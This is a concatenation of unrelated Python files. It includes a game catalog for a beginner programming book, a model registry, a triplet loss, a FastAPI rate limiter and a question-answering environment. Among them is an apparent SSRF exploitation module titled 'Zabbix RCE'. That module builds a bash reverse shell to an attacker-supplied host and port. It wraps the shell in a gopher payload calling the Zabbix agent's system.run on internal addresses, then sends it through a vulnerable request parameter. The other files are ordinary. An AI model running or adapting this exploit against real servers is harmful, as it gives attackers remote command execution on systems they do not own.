'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: extra-large, artistic, maze, game\n',
'filename': 'mazerunner3d.py',
'hash': 1239110670,
'name': 'Maze 3D'},
{ 'desc': 'Scrambles the middle letters of words, but not the first and last\n'
'letters.\n'
'Tags: tiny, beginner, word\n',
'filename': 'middleletterscrambler.py',
'hash': 3283455795,
'name': 'Middle Letter Scrambler'},
{ 'desc': 'By <NAME> <EMAIL>\n'
'A simulation of one million dice rolls.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, math, simulation\n',
'filename': 'milliondicestats.py',
'hash': 871470860,
'name': '"""Million Dice Roll Statistics Simulator\n'},
{ 'desc': 'Randomly generates art in the style of Piet Mondrian.\n'
'More info at: https://en.wikipedia.org/wiki/Piet_Mondrian\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, artistic, bext\n',
'filename': 'mondrian.py',
'hash': 435188245,
'name': 'Mondrian Art Generator'},
{ 'desc': 'A simulation of the Monty Hall game show problem.\n'
'More info at https://en.wikipedia.org/wiki/Monty_Hall_problem\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, math, simulation\n',
'filename': 'montyhall.py',
'hash': 3992505208,
'name': 'The Monty Hall Problem'},
{ 'desc': 'Translates between English and Morse Code.\n'
'More info at: https://en.wikipedia.org/wiki/Morse_code\n'
'Tags: short, word\n',
'filename': 'morsecode.py',
'hash': 4098290364,
'name': 'Morse Code'},
{ 'desc': 'Print a multiplication table.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, math\n',
'filename': 'multiplicationtable.py',
'hash': 3650356333,
'name': 'Multiplication Table'},
{ 'desc': 'By <NAME> <EMAIL>\n'
'Print the full lyrics to one of the longest songs ever! Press\n'
'Ctrl-C to stop.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, scrolling\n',
'filename': 'ninetyninebottles.py',
'hash': 4042967348,
'name': '"""Ninety-Nine Bottles of Milk on the Wall\n'},
{ 'desc': 'By <NAME> al@<EMAIL>withpython.com\n'
'Print the full lyrics to one of the longest songs ever! The song\n'
'gets sillier and sillier with each verse. Press Ctrl-C to stop.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, scrolling, word\n',
'filename': 'ninetyninebottles2.py',
'hash': 2733381554,
'name': '"""niNety-nniinE BoOttels of Mlik On teh waLl\n'},
{ 'desc': 'Shows equivalent numbers in decimal, hexadecimal, and binary.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, math\n',
'filename': 'numeralsystems.py',
'hash': 2069472375,
'name': 'Numeral System Counters'},
{ 'desc': 'A sliding tile puzzle game to move cars out of the way.\n'
"Inspired by <NAME>'s Rush Hour.\n"
'parkingvaletpuzzle.txt generated from puzzles by <NAME>man.\n'
'Download it from https://inventwithpython.com/parkingvaletpuzzles.txt\n'
'More info at https://www.michaelfogleman.com/rush/\n'
'Tags: large, board game, game, puzzle\n',
'filename': 'parkingvalet.py',
'hash': 1561926268,
'name': 'Parking Valet'},
{ 'desc': 'A single-player, peg-jumping game to eliminate all the pegs.\n'
'More info at https://en.wikipedia.org/wiki/Peg_solitaire\n'
'Tags: large, game, board game\n',
'filename': 'pegsolitaire.py',
'hash': 3263636572,
'name': 'Peg Solitaire'},
{ 'desc': 'Displays atomic information for all the elements.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, science\n',
'filename': 'periodictable.py',
'hash': 1324110721,
'name': 'Periodic Table of Elements'},
{ 'desc': 'Translates English messages into Igpay Atinlay.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, word\n',
'filename': 'piglatin.py',
'hash': 24373794,
'name': 'Pig Latin'},
{ 'desc': 'A simulation of the lottery so you can experience the thrill of\n'
'losing the lottery without wasting your money.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, humor, simulation\n',
'filename': 'powerballlottery.py',
'hash': 584110175,
'name': 'Powerball Lottery'},
{ 'desc': 'Calculates prime numbers, which are numbers that are only evenly\n'
'divisible by one and themselves. They are used in a variety of practical\n'
'applications.\n'
'More info at: https://en.wikipedia.org/wiki/Prime_number\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, math, scrolling\n',
'filename': 'primenumbers.py',
'hash': 644896521,
'name': 'Prime Numbers'},
{ 'desc': 'A sample progress bar animation that can be used in other programs.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, module\n',
'filename': 'progressbar.py',
'hash': 1737609597,
'name': 'Progress Bar Simulation'},
{ 'desc': 'The "rail fence" cipher for encrypting text.\n'
'More info at: https://en.wikipedia.org/wiki/Rail_fence_cipher\n'
'Tags: large, cryptography\n',
'filename': 'railfencecipher.py',
'hash': 436400985,
'name': 'Rail Fence Cipher'},
{ 'desc': 'Shows a simple rainbow animation. Press Ctrl-C to stop.\n'
'Tags: tiny, artistic, bext, beginner, scrolling\n',
'filename': 'rainbow1.py',
'hash': 735302012,
'name': 'Rainbow 1'},
{ 'desc': 'Shows a simple squiggle rainbow animation. Press Ctrl-C to stop.\n'
'Tags: tiny, artistic, bext, beginner, scrolling\n',
'filename': 'rainbow2.py',
'hash': 2007669186,
'name': 'Rainbow 2'},
{ 'desc': 'A tile flipping game, also called reversi.\n'
'More info https://en.wikipedia.org/wiki/Reversi\n'
'Tags: large, board game, game, two-player\n',
'filename': 'reversegam.py',
'hash': 950769813,
'name': 'Reversegam'},
{ 'desc': 'The classic hand game of luck.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, game\n',
'filename': 'rockpaperscissors.py',
'hash': 2003894144,
'name': '"""Rock, Paper, Scissors, by <NAME> <EMAIL>\n'},
{ 'desc': 'By <NAME> <EMAIL>\n'
'The classic hand game of luck, except you always win.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, game, humor\n',
'filename': 'rockpaperscissorsalwayswin.py',
'hash': 1707469529,
'name': '"""Rock,Paper, Scissors (Always Win version)\n'},
{ 'desc': 'The simplest shift cipher for encrypting and decrypting text.\n'
'More info at https://en.wikipedia.org/wiki/ROT13\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, cryptography\n',
'filename': 'rot13cipher.py',
'hash': 1506880261,
'name': 'ROT13 Cipher'},
{ 'desc': 'A rotating cube animation. Press Ctrl-C to stop.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, artistic, math\n',
'filename': 'rotatingcube.py',
'hash': 2438944116,
'name': 'Rotating Cube'},
{ 'desc': 'A 5,000 year old board game from Mesopotamia. Two players knock each\n'
'other back as they race for the goal.\n'
'More info https://en.wikipedia.org/wiki/Royal_Game_of_Ur\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, board game, game, two-player\n'
'\n',
'filename': 'royalgameofur.py',
'hash': 1057277339,
'name': 'The Royal Game of Ur'},
{ 'desc': 'A seven-segment number display module, used by the Countdown and Digital\n'
'Clock programs.\n'
'More info at https://en.wikipedia.org/wiki/Seven-segment_display\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, module\n',
'filename': 'sevseg.py',
'hash': 947695313,
'name': 'Sevseg'},
{ 'desc': 'A random gambling game to find the diamond under one of three shells.\nTags: tiny, beginner, game\n',
'filename': 'shellgame.py',
'hash': 705491737,
'name': 'Shell Game'},
{ 'desc': 'Displays a tessellation of the carpet pattern from The Shining.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, beginner, artistic\n',
'filename': 'shiningcarpet.py',
'hash': 1607388214,
'name': 'Shining Carpet'},
{ 'desc': 'A simple substitution cipher has a one-to-one translation for each\n'
'symbol in the plaintext and each symbol in the ciphertext.\n'
'More info at: https://en.wikipedia.org/wiki/Substitution_cipher\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, cryptography, math\n',
'filename': 'simplesubcipher.py',
'hash': 1406484596,
'name': 'Simple Substitution Cipher'},
{ 'desc': 'Create a sine-wavy message.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: tiny, artistic\n',
'filename': 'sinemessage.py',
'hash': 2811666296,
'name': 'Sine Message'},
{ 'desc': 'Slide the numbered tiles into the correct order.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, puzzle\n',
'filename': 'slidingtilepuzzle.py',
'hash': 2858053130,
'name': 'Sliding Tile Puzzle'},
{ 'desc': 'A screensaver of multicolor snakes moving around.\n'
'NOTE: Do not resize the terminal window while this program is running.\n'
'Tags: large, artistic, bext, object-oriented, simulation\n',
'filename': 'slitheringsnakes.py',
'hash': 3690444858,
'name': 'Slithering Snakes animation'},
{ 'desc': 'Fast-paced snail racing action!\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, artistic, beginner, game, multiplayer\n',
'filename': 'snailrace.py',
'hash': 1006720587,
'name': 'Snail Race'},
{ 'desc': 'The classic crate-pushing game originally by <NAME>\n'
'More info at: https://en.wikipedia.org/wiki/Sokoban\n'
'Tags: large, game, puzzle\n',
'filename': 'sokoban.py',
'hash': 2790913773,
'name': 'Sokoban Crate Pushing Game'},
{ 'desc': 'A simulation of a Japanese abacus calculator tool.\n'
'More info at: https://en.wikipedia.org/wiki/Soroban\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, artistic, math, simulation\n',
'filename': 'soroban.py',
'hash': 227252369,
'name': 'Soroban Japanese Abacus'},
{ 'desc': 'A pattern-matching game with sounds. Try to memorize an increasingly\n'
'longer and longer pattern of letters. Inspired by the electronic game,\n'
'Simon.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, beginner, game\n',
'filename': 'soundmimic.py',
'hash': 3991973973,
'name': 'Sound Mimic'},
{ 'desc': 'Translates English messages into sPOnGEtExT.\nTags: tiny, beginner, word\n',
'filename': 'spongetext.py',
'hash': 856597602,
'name': 'sPoNgEcAsE'},
{ 'desc': 'The classic 9x9 number placement puzzle.\n'
'More info at https://en.wikipedia.org/wiki/Sudoku\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, object-oriented, puzzle\n',
'filename': 'sudoku.py',
'hash': 724733092,
'name': 'Sudoku Puzzle'},
{ 'desc': 'An example program using the text-to-speech features of the pyttsx3\n'
'module.\n'
'View this code at https://nostarch.com/big-book-small-python-projects\n'
'Tags: tiny, beginner\n',
'filename': 'texttospeechtalker.py',
'hash': 3192030728,
'name': 'Text To Speech Talker'},
{ 'desc': 'Find the Queen of Hearts after cards have been swapped around.\n'
'(In the real-life version, the scammer palms the Queen of Hearts so you\n'
'always lose.)\n'
'More info at https://en.wikipedia.org/wiki/Three-card_Monte\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, card game, game\n',
'filename': 'threecardmonte.py',
'hash': 2721144305,
'name': 'Three-Card Monte'},
{ 'desc': 'The classic board game.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, board game, game, two-player\n',
'filename': 'tictactoe.py',
'hash': 29561780,
'name': 'Tic-Tac-Toe'},
{ 'desc': 'The classic board game. (Object-oriented programming version.)\n'
'Tags: large, board game, game, object-oriented, two-player\n',
'filename': 'tictactoeoop.py',
'hash': 391013425,
'name': 'Tic-Tac-Toe (OOP)'},
{ 'desc': 'A stack-moving puzzle game.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, game, puzzle\n',
'filename': 'towerofhanoi.py',
'hash': 3547311204,
'name': 'The Tower of Hanoi'},
{ 'desc': 'A quiz of several trick questions.\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, humor\n',
'filename': 'trickquestions.py',
'hash': 1555410789,
'name': 'Trick Questions'},
{ 'desc': '\n'
'This runs the turtledemo module that comes with Python, which contains\n'
"many example programs that use the Python's turtle module.\n"
'Tags: tiny, artistic\n',
'filename': 'turtledemowrapper.py',
'hash': 2442229216,
'name': 'Turtle Demo Wrapper'},
{ 'desc': 'A sliding tile game to combine exponentially-increasing numbers.\n'
"Inspired by <NAME>'s 2048, which is a clone of Veewo Studios'\n"
'1024, which in turn is a clone of the Threes! game.\n'
'More info at https://en.wikipedia.org/wiki/2048_(video_game)\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, puzzle\n',
'filename': 'twentyfortyeight.py',
'hash': 2427271091,
'name': 'Twenty Forty-Eight'},
{ 'desc': 'Instead of a board with 9 spaces, this game has 9 boards with 81 spaces,\n'
'the winner of each board placing their X or O on the big board!\n'
'More info at: https://en.wikipedia.org/wiki/Ultimate_tic-tac-toe\n'
'Tags: large, board game, game, two-player\n',
'filename': 'ultimatetictactoe.py',
'hash': 1474091896,
'name': 'Ultimate Tic-Tac-Toe'},
{ 'desc': 'The Vigenère cipher is a polyalphabetic substitution cipher that was\n'
'powerful enough to remain unbroken for centuries.\n'
'More info at: https://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: short, cryptography, math\n',
'filename': 'vigenerecipher.py',
'hash': 2001579518,
'name': 'Vigenère Cipher'},
{ 'desc': 'A water pouring puzzle.\n'
'More info: https://en.wikipedia.org/wiki/Water_pouring_puzzle\n'
'This code is available at https://nostarch.com/big-book-small-python-programming\n'
'Tags: large, game, math, puzzle\n',
'filename': 'waterbucket.py',
'hash': 4026463542,
'name': 'Water Bucket Puzzle'},
{ 'desc': '\n(Requires Pygame) Play against the computer and try to flip their tiles.\n',
'filename': 'pygame_games/flippy.py',
'hash': 3713351773,
'name': 'Flippy (a Reversi clone)'},
{ 'desc': '\n(Requires Pygame) Play against the computer, dropping tiles to connect four.\n',
'filename': 'pygame_games/fourinarow.py',
'hash': 530766230,
'name': 'Four-In-A-Row'},
{ 'desc': '\n(Requires Pygame) An addictive jewel matching game.\n',
'filename': 'pygame_games/gemgem.py',
'hash': 3403778852,
'name': 'Gemgem (a Bejeweled clone)'},
{ 'desc': '\n(Requires Pygame) Try to make the entire field a single color.\n',
'filename': 'pygame_games/inkspill.py',
'hash': 1212986240,
'name': 'Ink Spill (a Flood It clone)'},
{ 'desc': '\n(Requires Pygame) A simple memory matching game.\n',
'filename': 'pygame_games/memorypuzzle.py',
'hash': 2764951721,
'name': 'Memory Puzzle'},
{ 'desc': '\n(Requires Pygame) Like Pygame, except with 5-box blocks.\n',
'filename': 'pygame_games/pentomino.py',
'hash': 2488726696,
'name': 'Pentomino'},
{ 'desc': '\n(Requires Pygame) Copy the pattern of flashing lights for as long as possible.\n',
'filename': 'pygame_games/simulate.py',
'hash': 1595074871,
'name': 'Simulate (a Simon clone)'},
{ 'desc': '\n(Requires Pygame) The classic 15-tile slide puzzle.\n',
'filename': 'pygame_games/slidepuzzle.py',
'hash': 2239300442,
'name': 'Slide Puzzle'},
{ 'desc': '\n(Requires Pygame) A game where squirrels eat each other and grow monstrously large.\n',
'filename': 'pygame_games/squirrel.py',
'hash': 3066255054,
'name': 'Squirrel Eat Squirrel'},
{ 'desc': '\n(Requires Pygame) A puzzle game where you push the stars over their goals.\n',
'filename': 'pygame_games/starpusher.py',
'hash': 869642124,
'name': 'Star Pusher (a Sokoban clone)'},
{ 'desc': '\n(Requires Pygame) The classic block falling puzzle from the Soviet Union.\n',
'filename': 'pygame_games/tetromino.py',
'hash': 2002643604,
'name': 'Tetromino (a Tetris clone)'},
{ 'desc': '\n(Requires Pygame) Tetris, but... simpler.\n',
'filename': 'pygame_games/tetrominoforidiots.py',
'hash': 96477611,
'name': 'Tetromino for Idiots'},
{ 'desc': '\n(Requires Pygame) Lead the green snake around the screen eating red apples.\n',
'filename': 'pygame_games/wormy.py',
'hash': 4058946360,
'name': 'Wormy'}]
SUPPORT_FILES = { 'alphabetizewordquiz.py': ['commonenglishwords.txt'],
'hamsburger.py': ['nounlist.txt'],
'mazerunner2d.py': ['maze11x11s1.txt', 'maze51x17s42.txt'],
'periodictable.py': ['periodictable.csv'],
'pygame_games/flippy.py': [ 'pygame_games',
'pygame_games/freesansbold.ttf',
'pygame_games/flippyboard.png',
'pygame_games/flippybackground.png'],
'pygame_games/fourinarow.py': [ 'pygame_games/4row_red.png',
'pygame_games/4row_black.png',
'pygame_games/4row_humanwinner.png',
'pygame_games/4row_computerwinner.png',
'pygame_games/4row_tie.png',
'pygame_games/4row_arrow.png'],
'pygame_games/gemgem.py': [ 'pygame_games/freesansbold.ttf',
'pygame_games/badswap.wav',
'pygame_games/match0.wav',
'pygame_games/match1.wav',
'pygame_games/match2.wav',
'pygame_games/match3.wav',
'pygame_games/match4.wav',
'pygame_games/match5.wav',
'pygame_games/gem1.png',
'pygame_games/gem2.png',
'pygame_games/gem3.png',
'pygame_games/gem4.png',
'pygame_games/gem5.png',
'pygame_games/gem6.png',
'pygame_games/gem7.png'],
'pygame_games/inkspill.py': [ 'pygame_games/inkspilllogo.png',
'pygame_games/inkspillspot.png',
'pygame_games/inkspillsettings.png',
'pygame_games/inkspillsettingsbutton.png',
'pygame_games/inkspillresetbutton.png'],
'pygame_games/pentomino.py': [ 'pygame_games/freesansbold.ttf',
'pygame_games/tetrisb.mid',
'pygame_games/tetrisc.mid'],
'pygame_games/simulate.py': [ 'pygame_games/freesansbold.ttf',
'pygame_games/beep1.ogg',
'pygame_games/beep2.ogg',
'pygame_games/beep3.ogg',
'pygame_games/beep4.ogg'],
'pygame_games/slidepuzzle.py': ['pygame_games/freesansbold.ttf'],
'pygame_games/squirrel.py': [ 'pygame_games/freesansbold.ttf',
'pygame_games/gameicon.png',
'pygame_games/squirrel.png',
'pygame_games/grass1.png',
'pygame_games/grass2.png',
'pygame_games/grass3.png',
'pygame_games/grass4.png'],
'pygame_games/starpusher.py': [ 'pygame_games/RedSelector.png',
'pygame_games/Selector.png',
'pygame_games/Star.png',
'pygame_games/Wall_Block_Tall.png',
'pygame_games/Wood_Block_Tall.png',
'pygame_games/Plain_Block.png',
'pygame_games/Grass_Block.png',
'pygame_games/star_title.png',
'pygame_games/star_solved.png',
'pygame_games/princess.png',
'pygame_games/boy.png',
'pygame_games/catgirl.png',
'pygame_games/horngirl.png',
'pygame_games/pinkgirl.png',
'pygame_games/Rock.png',
'pygame_games/Tree_Short.png',
'pygame_games/Tree_Tall.png',
'pygame_games/Tree_Ugly.png',
'pygame_games/starPusherLevels.txt'],
'pygame_games/tetromino.py': [ 'pygame_games/freesansbold.ttf',
'pygame_games/tetrisb.mid',
'pygame_games/tetrisc.mid'],
'pygame_games/tetrominoforidiots.py': [ 'pygame_games/freesansbold.ttf',
'pygame_games/tetrisb.mid',
'pygame_games/tetrisc.mid'],
'pygame_games/wormy.py': ['pygame_games/freesansbold.ttf'],
'rushhour.py': ['rushhourpuzzles.txt'],
'sokoban.py': ['sokobanlevels.txt'],
'sudoku.py': ['sudokupuzzles.txt']}
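# --- Usage sketch (illustrative; the helper below is an assumption, not part of
# --- the original data) ---
# SUPPORT_FILES maps a program's filename to the extra data/asset files it needs
# at runtime. A launcher could look those up roughly like this:
#
#   def support_files_for(filename):
#       """Return the support files a program depends on, or an empty list."""
#       return SUPPORT_FILES.get(filename, [])
#
#   support_files_for('sokoban.py')     # -> ['sokobanlevels.txt']
#   support_files_for('tictactoe.py')   # -> []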
|
469818
|
from core.utils import *
import logging
import urllib.parse as urllib
# NOTE
# Require `EnableRemoteCommands = 1` on the Zabbix service
name = "zabbix"
description = "Zabbix RCE"
author = "Swissky"
documentation = []
class exploit():
cmd = "bash -i >& /dev/tcp/SERVER_HOST/SERVER_PORT 0>&1"
def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name))
cmd = input("Give command to execute (Enter for Reverse Shell): ")
if cmd == "":
if args.lhost is None:
self.cmd = self.cmd.replace("SERVER_HOST", input("Server Host:"))
else:
self.cmd = self.cmd.replace("SERVER_HOST", args.lhost)
if args.lport is None:
self.cmd = self.cmd.replace("SERVER_PORT", input("Server Port:"))
else:
self.cmd = self.cmd.replace("SERVER_PORT", args.lport)
else:
self.cmd = cmd
# Data for the service
gen_host = gen_ip_list("127.0.0.1", args.level)
for ip in gen_host:
port = "10050"
self.cmd = urllib.quote_plus(self.cmd).replace("+","%20")
self.cmd = self.cmd.replace("%2F","/")
self.cmd = self.cmd.replace("%25","%")
self.cmd = self.cmd.replace("%3A",":")
data = "system.run[(" + self.cmd + ");sleep 2s]"
payload = wrapper_gopher(data, ip , port)
logging.info("Generated payload : {}".format(payload))
# Send the payload
r = requester.do_request(args.param, payload)
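# --- Usage sketch (illustrative only; not part of the original module) ---
# Within the surrounding framework this class is driven by a loader that passes
# in a requester object and parsed arguments. A minimal, hypothetical invocation
# could look like this (only lhost, lport, level, param and do_request are taken
# from this file; everything else is an assumption):
#
#   import argparse
#   args = argparse.Namespace(lhost="10.0.0.1", lport="4444", level=1, param="url")
#   exploit(requester, args)   # `requester` must expose do_request(param, payload)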
|
469851
|
import logging
from typing import Type, Union
from modelforge.model import Model
from modelforge.storage_backend import StorageBackend
__models__ = set()
def register_model(cls: Type[Model]):
"""
Include the given model class into the registry.
:param cls: The class of the registered model.
:return: None
"""
if not issubclass(cls, Model):
raise TypeError("model bust be a subclass of Model")
if issubclass(cls, GenericModel):
raise TypeError("model must not be a subclass of GenericModel")
__models__.add(cls)
return cls
class GenericModel(Model):
"""
Compatible with any model: loads it in :func:`__init__`.
"""
NAME = Model.GENERIC_NAME
VENDOR = "modelforge"
DESCRIPTION = "does not matter"
def __init__(self, source: Union[str, "Model"]=None, dummy=False, cache_dir: str=None,
backend: StorageBackend=None, **kwargs):
"""
Initialize a new `GenericModel`.
:param source: UUID, file system path, file object or an URL; None means auto.
:param dummy: if True, ignore unknown model types.
:param cache_dir: The directory where to store the downloaded model.
:param backend: Remote storage backend to use if ``source`` is a UUID or a URL.
:param kwargs: Everything is passed directly to `Model.__init__`.
"""
super().__init__(**kwargs)
self._models = {m.NAME: m for m in __models__} if not dummy else {}
self.load(source=source, cache_dir=cache_dir, backend=backend)
def _load_tree(self, tree):
model = self._models.get(self.meta["model"])
if model is None:
if self._models:
raise ValueError("Unknown model: %s" % self.meta["model"])
return
# we overwrite our class - shady, but works
delattr(self, "_models")
self.__class__ = model
log_level = self._log.level
self._log = logging.getLogger(self.NAME)
self._log.setLevel(log_level)
self._load_tree(tree)
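# --- Usage sketch (illustrative; `MyModel` and the file path are hypothetical) ---
# A concrete model class is registered with the decorator above; GenericModel
# then loads an arbitrary serialized model and, in _load_tree, swaps its own
# class for the registered one matching meta["model"]:
#
#   @register_model
#   class MyModel(Model):
#       NAME = "my-model"
#       def _load_tree(self, tree):
#           self.data = tree["data"]
#
#   model = GenericModel("/path/to/model.asdf")
#   # isinstance(model, MyModel) holds if the file's meta["model"] == "my-model"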
|
469938
|
from eventsourcing.infrastructure.event_sourced_repo import EventSourcedRepository
from quantdsl.domain.model.market_simulation import MarketSimulation, MarketSimulationRepository
class MarketSimulationRepo(MarketSimulationRepository, EventSourcedRepository):
domain_class = MarketSimulation
|
469960
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
class TripletLossFilter(nn.Module):
"""Triplet loss with hard positive/negative mining.
Reference:
Hermans et al. In Defense of the Triplet Loss for Person Re-Identification. arXiv:1703.07737.
Code imported from https://github.com/Cysu/open-reid/blob/master/reid/loss/triplet.py.
Args:
margin (float): margin for triplet.
"""
def __init__(self, margin=0.3):
super(TripletLossFilter, self).__init__()
self.margin = margin
self.ranking_loss = nn.MarginRankingLoss(margin=margin)
def forward(self, inputs, targets):
"""
Computes the triplet loss, ignoring noise samples labeled -1.
Args:
inputs: feature matrix with shape (batch_size, feat_dim)
targets: ground truth labels with shape (batch_size)
"""
#print(inputs.shape, targets.shape)
inputs_new = []
targets_new = []
targets_value = []
for i in range(len(targets)):
if targets[i] == -1:
continue
else:
inputs_new.append(inputs[i])
targets_new.append(targets[i])
targets_value.append(targets[i].cpu().numpy().item())
if len(set(targets_value)) < 2:
tmp_loss = torch.zeros(1)
tmp_loss = tmp_loss[0]
tmp_loss = tmp_loss.to(targets.device)
return tmp_loss
#print(targets_value)
inputs_new = torch.stack(inputs_new)
targets_new = torch.stack(targets_new)
#print(inputs_new.shape, targets_new.shape)
n = inputs_new.size(0)
# Compute pairwise distance, replace by the official when merged
dist = torch.pow(inputs_new, 2).sum(dim=1, keepdim=True).expand(n, n)
dist = dist + dist.t()
dist.addmm_(inputs_new, inputs_new.t(), beta=1, alpha=-2)  # keyword form; the positional beta/alpha call is deprecated
dist = dist.clamp(min=1e-12).sqrt() # for numerical stability
#print("Triplet ", dist)
# For each anchor, find the hardest positive and negative
mask = targets_new.expand(n, n).eq(targets_new.expand(n, n).t())
#print(mask)
dist_ap, dist_an = [], []
for i in range(n):
dist_ap.append(dist[i][mask[i]].max())
dist_an.append(dist[i][mask[i] == 0].min())
#dist_ap = torch.cat(dist_ap)
#dist_an = torch.cat(dist_an)
dist_ap = torch.stack(dist_ap)
dist_an = torch.stack(dist_an)
# Compute ranking hinge loss
y = torch.ones_like(dist_an)
#y = dist_an.data.new()
#y.resize_as_(dist_an.data)
#y.fill_(1)
#y = Variable(y)
loss = self.ranking_loss(dist_an, dist_ap, y)
return loss
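if __name__ == "__main__":
    # Minimal usage sketch (not part of the original module). Shapes follow the
    # docstring above; the -1 labels mark noise samples the loss skips, and the
    # feature values are random, purely for illustration.
    torch.manual_seed(0)
    feats = torch.randn(6, 128)                   # (batch_size, feat_dim)
    labels = torch.tensor([0, 0, 1, 1, -1, -1])   # two identities plus two noise samples
    criterion = TripletLossFilter(margin=0.3)
    print("triplet loss:", criterion(feats, labels).item())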
|
469977
|
import logging
from fastapi import HTTPException, Depends, Request
from contextlib import contextmanager
from redis import RedisError
from redis_rate_limit import RateLimiter, TooManyRequests
from idunn.utils.redis import get_redis_pool, RedisNotConfigured
from idunn import settings
logger = logging.getLogger(__name__)
TooManyRequestsException = TooManyRequests
@contextmanager
def dummy_limit():
yield
class IdunnRateLimiter:
def __init__(self, resource, max_requests, expire):
self.resource = resource
self.max_requests = max_requests
self.expire = expire
self._init_limiter()
def _init_limiter(self):
try:
redis_pool = get_redis_pool(db=settings["RATE_LIMITER_REDIS_DB"])
except RedisNotConfigured:
logger.warning("Redis URL not configured: rate limiter not started")
self._limiter = None
else:
# If a redis is configured, then we use the corresponding redis service in the rate
# limiter.
self._limiter = RateLimiter(
resource=self.resource,
max_requests=self.max_requests,
expire=self.expire,
redis_pool=redis_pool,
)
def limit(self, client, ignore_redis_error=False):
if self._limiter is None:
return dummy_limit()
@contextmanager
def limit():
try:
with self._limiter.limit(client):
yield
except RedisError:
if ignore_redis_error:
logger.warning(
"Ignoring RedisError in rate limiter for %s",
self._limiter.resource,
exc_info=True,
)
yield
else:
raise
return limit()
def check_limit_per_client(self, request):
client_id = request.headers.get("x-client-hash") or "default"
try:
with self.limit(client=client_id, ignore_redis_error=True):
pass
except TooManyRequestsException as exc:
raise HTTPException(status_code=429, detail="Too Many Requests") from exc
def rate_limiter_dependency(**kwargs):
rate_limiter = IdunnRateLimiter(**kwargs)
def dependency(request: Request):
rate_limiter.check_limit_per_client(request)
return Depends(dependency)
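# --- Usage sketch (illustrative; the route path and limit values are assumptions) ---
# rate_limiter_dependency() builds a FastAPI dependency that enforces the
# per-client limit implemented above (keyed on the "x-client-hash" header):
#
#   from fastapi import FastAPI
#
#   app = FastAPI()
#   limit_places = rate_limiter_dependency(resource="places", max_requests=100, expire=60)
#
#   @app.get("/v1/places", dependencies=[limit_places])
#   def list_places():
#       return {"status": "ok"}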
|
470024
|
import pdb
import cv2
import numpy as np
import random
import os
from utils import game_util
from utils import drawing
import constants
class PersonGameState(object):
def __init__(self):
self.env = game_util.create_env()
self.env.step({'action': 'Initialize', 'gridSize': constants.AGENT_STEP_SIZE})
self.local_random = random.Random()
self.question_types = ['existence', 'counting', 'contains']
self.datasets = []
self.test_datasets = []
self.num_steps = 0
self.num_failed_steps = 0
for (qq, question_type) in enumerate(self.question_types):
data_file = os.path.join('questions', 'train', 'data' + '_' + question_type, 'combined.csv')
if qq in constants.USED_QUESTION_TYPES:
dataset = [line.strip().split(',') for line in open(data_file)][1:]
self.datasets.append(dataset)
print('Type', question_type, 'num_questions', len(self.datasets[-1]))
else:
self.datasets.append([])
# test data
data_file = os.path.join('questions', constants.TEST_SET, 'data' + '_' + question_type, 'combined.csv')
if qq in constants.USED_QUESTION_TYPES:
dataset = [line.strip().split(',') for line in open(data_file)][1:]
self.test_datasets.append(dataset)
print('Type', question_type, 'num_questions', len(self.test_datasets[-1]))
else:
self.test_datasets.append([])
def reset(self, seed=None, test_ind=None):
if seed is not None:
self.local_random.seed(seed)
question_row, question_type_ind = test_ind
question_type = self.question_types[question_type_ind]
question_data = self.test_datasets[question_type_ind][question_row % len(self.test_datasets[question_type_ind])]
scene_num, scene_seed, question_str, answer = question_data[1:5]
self.scene_seed = int(scene_seed)
self.scene_num = int(scene_num)
self.question_str = question_str
self.question_type_ind = question_type_ind
self.scene_name = 'FloorPlan%d' % self.scene_num
grid_file = 'layouts/%s-layout.npy' % self.scene_name
self.points = (np.load(grid_file) * 1.0 / constants.AGENT_STEP_SIZE).astype(int)
max_num_repeats = 1
remove_prob = 0.5
if question_type == 'existence':
max_num_repeats = 10
remove_prob = 0.25
elif question_type == 'counting':
max_num_repeats = constants.MAX_COUNTING_ANSWER + 1
remove_prob = 0.5
elif question_type == 'contains':
max_num_repeats = 10
remove_prob = 0.25
